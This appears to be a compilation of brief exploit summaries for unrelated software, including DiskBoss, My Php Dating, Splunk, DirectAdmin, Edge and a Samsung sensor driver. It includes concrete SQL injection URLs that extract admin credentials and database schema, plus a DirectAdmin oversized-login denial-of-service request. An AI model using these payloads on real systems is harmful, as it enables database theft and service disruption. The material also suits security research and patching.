Vulnerable Parametre: linkid. An attacker can inject malicious SQL code into the linkid parameter of the outgoing.php page, allowing them to gain access to the underlying database.
DiskBoss Enterprise 7.5.12 is vulnerable to a SEH + Egghunter Buffer Overflow vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an overly long string of 'A' characters followed by an egg, nopslide, shellcode, and a 'C' character padding. This will cause a buffer overflow and allow the attacker to execute arbitrary code.
An attacker can exploit this vulnerability to read from the database. The parameter 'imgid' is vulnerable.
My Php Dating 2.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by sending a crafted URL to the application. For example, http://localhost/[PATH]/view_image.php?path=-124 union select 1,version(),3,4,5,6,7,8,9 can be used to extract the version of the database. Similarly, http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(admin_id,admin_uname,admin_pass,admin_email),3,4,5,6,7,8,9+from+admin_master-- can be used to extract the admin credentials. http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()-- can be used to extract the column names and http://localhost/[PATH]/view_image.php?path=-124+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- can be used to extract the table names.
Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
An attacker can send a username and password in the login screen DirectAdmin long,DirectAdmin to disrupt And Crach. This problem is present in all versions of DirectAdmin. There is no limit on the number of characters entered. attacker could write a script to attack DDoS based on the following information: http://Ip:2222/CMD_LOGIN POST /CMD_LOGIN HTTP/1.1 referer=%2F&username=$POC&password=$POC $POC = A * 10000
This Application Developed To Lock Desktop Control When User Download Files Or Anywhere. The exploit involves opening the Run shortcut (Ctrl + R) and writing 'taskmgr' to open the Task Manager. From there, the user can select the ADL process and click delete to kill it, thus bypassing the application.
Address Bar spoofing is a critical vulnerability in which any attacker can spoof the address bar to a legit looking website but the content of the web-page remains different from the Address-Bar display of the site. In Simple words, the victim sees a familiar looking URL but the content is not from the same URL but the attacker controlled content.
The MAX86902 sensor has a driver that exposes several interfaces through which the device may be configured. In addition to exposing a character device, it also exposes several entries under sysfs. Some of these entries are writable, allowing different values to be configured. Three such files are exposed under the paths: /sys/devices/virtual/sensors/hrm_sensor/eol_test_result, /sys/devices/virtual/sensors/hrm_sensor/lib_ver, /sys/devices/virtual/sensors/uv_sensor/uv_lib_ver. The sysfs write handlers for these files all share approximately the same logic. Since the code does not use any mechanism to prevent concurrent access, it contains race conditions which allow corruption of kernel memory. For example, one such race condition could occur when two attempts to call 'write' are executed at the same time, where the underlying buffers have different lengths.
Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201). Tested on Windows 10 Edge (modern.ie stable). FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3)